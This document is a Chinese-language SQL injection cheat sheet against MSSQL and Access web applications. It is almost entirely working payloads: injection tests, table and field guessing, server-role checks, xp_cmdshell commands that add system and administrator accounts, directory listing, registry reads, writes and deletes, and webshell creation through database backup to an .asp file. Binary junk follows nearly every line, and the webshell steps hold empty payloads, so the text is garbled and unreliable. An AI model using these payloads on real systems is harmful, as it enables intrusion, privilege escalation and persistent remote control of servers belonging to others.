1.判断是否有注入;and 1=1 ;and 1=2 �9$i`B>C�~
2.初步判断是否是mssql ;and user>0 \[�jItg�,+
�v$Z1��L�h
3.注入参数是字符'and [查询条件] and ''=' cx�dM!L; `
�(5
hu
W7v
4.搜索时没过滤参数的'and [查询条件] and '%25'=' XP�KcF �I=
58,mu�#yq6
5.判断数据库系统 ;z�ODp+4@Q
OwUbm0)h^V
;and (select count(*) from sysobjects)>0 mssql E�G6fC4rfC
IgJC>�;]�u
;and (select count(*) from msysobjects)>0 access TXv���#/�@
!y.7�"�G�*
3\��ed4D��
IuD<lMeJ�J
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �3�.Kdz}��
}X-�gg�O�,
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 k����9�]n/
!}?]��&[N=
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 J$[�Vm%5�6
�Sa5�y7
��
9.(1)猜字段的ascii值(access) s5��e}��X:
i�9tM]/�SP
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �L zC~>�Uj
��Sq%���R
(2)猜字段的ascii值(mssql) vD �t?�N9�
�j�T',+���
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ���/8T{bJ5
jL&F7�itP�
10.测试权限结构(mssql) �)�&K%Me��
�Ns(F%zk�m
@}:(t{>;e7
pz�+#�1=b]
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ?�*�=���Jq
t�T�a��l<4
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- `N+ P���,�
TzJN,]�F!M
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- mMH0 o����
!WXSrI�CX[
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �R�e_.<�_$
�t|%ul6{gz
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- P�H.v3�
3K
�=�UN:�IzT
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �f{�0PL�Fj
3V]a "C
��
;and 1=(select IS_MEMBER('db_owner'));-- |�>)mYLN!y
gC.T��5,tn
�GU`2I�/R�
K�V���2X[1
11.添加mssql和系统的帐户 �w'C(? ?mH
FU zY�&@�Y
;exec master.dbo.sp_addlogin username;-- ��gC_U7a�w
;exec master.dbo.sp_password null,username,password;-- LJ?7�W�,?�
h.NA�$E?7�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �Sj\8$QIXC
'4EJ_Vhztc
;exec master.dbo.xp_cmdshell 'net user username password Rd/!CJ�@g
lCXo+|$?�s
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �
Ox�RzKT�
2\�n�6XAQ*
;exec master.dbo.xp_cmdshell 'net user username password /add';-- FsjblB�3?E
&>SE9w/�?o
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- r.[�k�D"�l
.vg�;K@�{�
,b{4��GU$3
udMq>��s;�
12.(1)遍历目录 3f0RMk$p�H
~9=g��"�v�
;create table dirs(paths varchar(100), id int) V.qB3��V�$
�oT
OMqR{"
;insert dirs exec master.dbo.xp_dirtree 'c:\' %0 S��0�"t
�'�tekn�e�
;and (select top 1 paths from dirs)>0 8I%1�
`V��
>
ewcD{bt
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ? T9-FG�W�
o/&Q^^Xj^~
G�"�]'`2.m
*=�rl<�?tX
(2)遍历目录 @L0.Z�1 ).
mSs%g��L]g
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ��^+�8�8z>
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 +m_�quQ/ys
$�|AxQQ�%f
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 eG.�?s�;J0
pV_2JXM�~@
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �*5^h>�Vk/
bT�J�7Rq�L
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ;TY��kJH"�
nL�9m�{$Zv
�k�2~�j:&p
-O\�`G<s%�
13.mssql中的存储过程 yfj<P/aA�+
u7�K0m!
jW
xp_regenumvalues 注册表根键, 子键 Lq�:Z='K�c
]`�%cTdpLj
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �C
�7�v
�8
�:��7'a�nj
xp_regread 根键,子键,键值名 \O[Cae:^�?
n,�`&f~tap
;exec xp_regread `3~w�#?+=*
|2Q;SaI�^\
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 uT�Q/��_$
O:��4.x��e
xp_regwrite 根键,子键, 值名, 值类型, 值 opK�t�SF|)
@�AJt/wPk�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 {�B�34^�H:
]O�^!P,l)"
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Vx'_fb?wap
� ��C+_ NG
xp_regdeletevalue 根键,子键,值名 _�("{f�J,A
o`G�@Je_}x
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 *�x$\5�;A
ws@;2?�%A
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 "!2�Fy-�Y�
��\\���_Qv
$%�LjIeVA5
X�=lOw�PvP
14.mssql的backup创建webshell |VIBSty2d�
mhL�,�:UE�
use model )tB mSVprl
R4�{2+q�=0
create table cmd(str image); )]'�?�yS"
�E1�=�]m��
insert into cmd(str) values (''); Lf3�:�'� n
���cJ&%�XN
backup database model to disk='c:\l.asp'; :W�E(�1!P@
��QHO�em=B
C;_10Rb2ut
-��rUn4a�
15.mssql内置函数 7�tJ�Pjp4l
�^J?I�-�LG
;and (select @@version)>0 获得Windows的版本号 !�9�B)/X�i
`z�F=�h#i�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa k ��\|Hd"T
~)ls.�NXI
;and (select user_name())>0 爆当前系统的连接用户 Pn0V{SJOJ%
�5TqX;=B��
;and (select db_name())>0 得到当前连接的数据库 ~nw]q<�7�r
�/_v@YB!�0
D�3$}S{Yw1
El�,p�}Bi.
16.简洁的webshell �M(xd:Fa?
;a2TONW� �
use model 42mda�k}�\
�{2A/�@$?�
create table cmd(str image); z>�~Hc8*]3
?Yxk1Y4ig)
insert into cmd(str) values (''); jT%k{"+>+?
\f��.ceh;!
backup database model to disk='g:\wwwtest\l.asp';
